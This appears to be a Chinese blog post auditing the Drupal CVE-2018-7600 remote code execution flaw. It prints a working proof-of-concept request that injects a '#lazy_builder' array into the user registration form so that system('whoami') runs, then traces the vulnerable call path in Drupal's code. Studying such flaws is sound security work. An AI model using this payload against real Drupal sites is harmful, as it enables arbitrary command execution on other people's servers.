代码审计之CVE-2018-7600-Drupal远程代码执行漏洞-Render API
2024-10-08 02:58:22
今天学习一下Drupal的另一个漏洞,由于渲染数组不当造成的漏洞
poc:
url:
http://localhost/drupal-8.5.0/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax post:
'mail[a][#lazy_builder][0]': 'system',
'mail[a][#lazy_builder][1][]': 'whoami',
'form_id': 'user_register_form'
使用poc进行测试,并在断点处观察其调用流程:
函数的漏洞入口点在:
\core\modules\file\src\Element\ManagedFile.php处
经过explode函数处理,将get请求中的element_parents参数的值变成一个数组:即比如a/b/c变成了["a","b","c"]
然后将处理完的$form_parents变量传给NestedArray类的getValue函数处理,其中$form包含了表单的所有信息,我们跟进一下:
其中getValue函数就是将$form中的值逐层取出,
如果$parents为a/b/c,则结果值为123
此时$callable变量为system,$args变量为["whoami"],然后再调用call_user_func_array()函数处理
最新文章
- 关于meta标签
- c# 支付宝查单补单
- Hook to function
- linux安装gcc的一些问题。
- WinForm 控件库
- JS-商品图片放大器
- hdu_2871_Memory Control(巨恶心线段树)
- 简单的java高斯模糊算法
- CSS如何让DIV的宽度随内容的变化
- Swing-setBounds()用法-入门
- Jquery DataTable AJAX跨域请求的解决方法及SSM框架下服务器端返回JSON格式数据的解决方法
- Java实现Html转PDF的方法
- 解决win7中防火墙的0x6D9问题的方法
- maven 中的pom中的 dependencyManagement 和 dependencies
- 一、java虚拟机内存区域
- JS中常用的输出方式(五种)
- Spring注解之 Transactional
- Django Rest Framework----ModelViewSet视图 ModelViewSet源码分析
- Navicat运行sql文件报错out of memory
- P(Y|X) 和 P(X,Y)